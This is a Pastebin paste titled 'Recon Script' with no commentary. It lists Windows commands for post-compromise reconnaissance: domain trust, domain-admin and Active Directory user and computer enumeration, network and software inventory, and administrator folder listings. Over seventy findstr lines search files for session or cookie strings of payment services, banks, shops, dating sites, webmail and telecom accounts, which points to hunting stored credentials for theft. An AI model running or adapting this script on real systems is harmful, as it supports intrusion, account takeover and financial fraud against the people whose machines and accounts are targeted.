Guest User

Recon Script

a guest
Feb 17th, 2020
549
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. nltest /domain_trusts
  2. net config workstation
  3. net view /all
  4. net view /all /domain
  5. net group “domain admins” /domain
  6. dsquery * -filter “objectcategory=computer” -attr dNSHostName distinguishedName description operatingSystem -limit 0
  7. dsquery * -filter “&(objectcategory=person)(samaccountname=*)” -attr sAMAccountName mail comment description -limit 0
  8. net session
  9. net user
  10. systeminfo
  11. find /V “KB”
  12. ipconfig /all
  13. netstat -an
  14. find /i “listening”
  15. net config workstation
  16. reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall”
  17. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime” /v DisplayName
  18. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore” /v DisplayName
  19. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40” /v DisplayName
  20. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data” /v DisplayName
  21. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX” /v DisplayName
  22. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData" /v DisplayName
  23. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack" /v DisplayName
  24. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2" /v DisplayName
  25. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent" /v DisplayName
  26. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC" /v DisplayName
  27. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0040E310-5FEB-4626-BA89-7678B473DEF8}" /v DisplayName
  28. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5525C0AB-E025-4951-9C84-DD490DD95B0F}" /v DisplayName
  29. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D339C288-2EEA-49A3-B10F-979FC2715A2C}" /v DisplayName
  30. REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F383A96C-9EF4-4ED9-BE86-85A938DCE021}" /v DisplayName
  31. tasklist
  32. ipconfig
  33. find "IPv4"
  34. findstr /m cookie_check.paypal.com *
  35. findstr /m paypal.comcookie_check *
  36. findstr /m account.skrill.com *
  37. findstr /m westernunion.com *
  38. findstr /m neteller.com *
  39. findstr /m entropay.com *
  40. findstr /m 2checkout.com *
  41. findstr /m wepay.com *
  42. findstr /m .v.me *
  43. findstr /m gopayment.com *
  44. findstr /m dwolla.com *
  45. findstr /m aib.ie *
  46. findstr /m barclaycardus.com *
  47. findstr /m capitalone.com *
  48. findstr /m chase.com *
  49. findstr /m coinbase.com *
  50. findstr /m liqpay.com *
  51. findstr /m moneybookers.com *
  52. findstr /m open24.ie *
  53. findstr /m payeer.com *
  54. findstr /m paysurfer.com *
  55. findstr /m perfectmoney.com *
  56. findstr /m suntrust.com *
  57. findstr /m wellsfargo.com *
  58. findstr /m sears.com *
  59. findstr /m overstock.com *
  60. findstr /m ebay.comnonsession *
  61. findstr /m dell.com *
  62. findstr /m amazon.comsession *
  63. findstr /m apple.comdssid *
  64. findstr /m beacon.walmart.com *
  65. findstr /m bestbuy.comcontext_id *
  66. findstr /m newegg.coms_per *
  67. findstr /m airbnb.com *
  68. findstr /m bhphotovideo.com *
  69. findstr /m farfetch.com *
  70. findstr /m lowes.com *
  71. findstr /m officedepot.com *
  72. findstr /m qvc.com *
  73. findstr /m steampowered.com *
  74. findstr /m target.com *
  75. findstr /m match.com *
  76. findstr /m mysinglefriend.com *
  77. findstr /m friendfinder.com *
  78. findstr /m jdate.com *
  79. findstr /m gay.com *
  80. findstr /m christianconnection.com *
  81. findstr /m muddymatches.co.uk *
  82. findstr /m zoosk.com *
  83. findstr /m shaadi.com *
  84. findstr /m datingdirect.com *
  85. findstr /m lovearts.com *
  86. findstr /m amateurmatch.com *
  87. findstr /m cupid.com *
  88. findstr /m datehookup.com *
  89. findstr /m meetic.com *
  90. findstr /m meetme.com *
  91. findstr /m accounts.google.com *
  92. findstr /m mail.live.com *
  93. findstr /m login.yahoo.com *
  94. findstr /m att.com *
  95. findstr /m sprint.com *
  96. findstr /m verizonwireless.com *
  97. findstr /m vzw.com *
  98. findstr /m verizon.com *
  99. findstr /m craiglist.org *
  100. findstr /m indeed.com *
  101. findstr /m sendspace.com *
  102. findstr /m swiftunlocks.com *
  103. findstr /m ups.com *
  104. findstr /m whoer.net *
  105. findstr /m fedex.com *
  106. powershell Get-ChildItem -Path C:\ -ErrorAction SilentlyContinue
  107. powershell Get-ChildItem -Path \"C:\Program Files\" -ErrorAction SilentlyContinue
  108. powershell Get-ChildItem -Path \"C:\Program Files (x86) \" -ErrorAction SilentlyContinue
  109. powershell Get-ChildItem -Path \"C:\Users\administrator\AppData\Roaming\" -ErrorAction SilentlyContinue
  110. powershell Get-ChildItem -Path \"C:\Users\administrator\AppData\Local\" -ErrorAction SilentlyContinue
  111. powershell Get-ChildItem -Path \"C:\Users\administrator\Desktop\" -ErrorAction SilentlyContinue
  112. powershell Get-ChildItem -Path \"C:\Users\administrator\Downloads\" -ErrorAction SilentlyContinue
  113. powershell Get-ChildItem -Path \"C:\Users\administrator\Documents\" -ErrorAction SilentlyContinue
  114. C:\Windows\system32\cmd.exe /S /D /c" TYPE win_install.log.txt "
RAW Paste Data